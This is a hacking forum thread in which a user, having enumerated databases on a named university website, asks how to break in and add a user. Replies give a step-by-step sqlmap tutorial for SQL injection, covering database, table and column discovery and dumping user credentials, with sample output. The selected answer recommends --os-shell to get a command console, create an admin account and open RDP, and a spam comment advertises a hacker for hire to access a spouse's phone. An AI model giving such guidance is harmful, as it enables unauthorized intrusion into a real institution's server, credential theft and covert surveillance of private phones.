0 votes
193 views
asked in Hacking by
closed by

I found some databases on a website which is under as:

web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] Admission
[*] LIVE_AIOU
[*] master
[*] model
[*] msdb
[*] OBJ
[*] Online-Admission
[*] Pictures
[*] Queries
[*] ReportServer
[*] ReportServerTempDB
[*] Rollnoslips
[*] STATS
[*] tempdb
[*] Tutor_List
[*] Tutors
[*] UMC

Now i would like to know which database is connected to the webpage (www.aiou.edu.pk/Tutorship.asp).

and how i will hack or edit the database, if i want to add a user in database.

related to an answer for: How to hack DBMS Sql server 2008?
closed with the note: answer selected
commented by

.:: Educational Purpose Only ::.

what is sqlmap?

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

Vulnerable Url:

http://www.site.com/section.php?id=51
and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
Hacking with sqlmap
in console try this
sqlmap -u http://site.com/index.asp?id=765

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ sqlmap  -u "http://www.sitemap.com/section.php?id=51" --dbs

and the result should be 

[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'mywebdb

sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb
and the output can be something similar to this
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.

sqlmap  -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users

The output can be something like this

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would be

sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
ok we did it,
now you are asking how you will get the exact vuln "id=" yea  scan that site in some automated scanner if they detected a sql injection error then you will get a vulnerable link try on that i hope its might enough.

1 Answer

0 votes
answered by
selected by
 
Best answer

that query has already been answered by  --current-db switch in sqlmap or select db_name() query.

How to Hack a server through its DB a.k.a pwnage 

well , first of all edit your question and hide the website address as we do not promote unauthorized hacking (its baaad) 

as you shared a windows server , although you did not share the connected user but I assume its a SYSTEM account which means that it has admin rights on the server , so there is nothing hard now , is it ? 

just use --os-shell switch in sqlmap to get your self a command console , from there you can add a new user with admin rights , check if RDP is open .. if not open that or even spawn a PowerShell (refer to my powershell archive hacks and techniques ) 

–os-shell: SQLMap will try to get the operating system command shell by exploiting SQL injection

with the above you can wreak havoc

Play Safe

commented by
When i type ./sqlmap.py ........ It says no file directory found, it seems that ./sqlmap.py is not installed ??
commented by
How i will come to know that which page.asp is linked connected with which database ? i want to add some data details in a site.com/page.asp?id=555
So what i will do first to login in the database ? Which thing will allow me to login into database and where i can add my own data in a specify id to edit or add.
commented by
when you type ./sqlmap.py it says no file ok,

go for => sqlmap -u http://site.com/page.asp?aid=434 --dbs << try this if it worked then try for --current-user --is-dba
if you want to know which page.asp is linked connected with database then scan full site or server on your b0x now lemme explain you full tut
commented by
Can you give me your e.mail id where i can send you all output data/details.
commented by
edited by
Hi here...i'm Barry, i'm here to thank Birdeye (thats what he calls himself lol) for saving me from the most dangerous woman you can ever meet in several lifetimes. I was suspicious she was trying to kill me because of some insurance money, i was able to contact Birdeye to give me access to her phone so i could get her conversations with the men she was hiring. I also got to find out she was also cheating on me with a friend of mine. All thanks to BIRDEYE.HACK at MAIL.COM for saving my life. Contact him today, he's the best among all others. You can use me as your reference,,
Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking,Technology,Gaming,Programming and everything to get you going with your Cyber World.

124 questions

129 answers

280 comments

106 users

...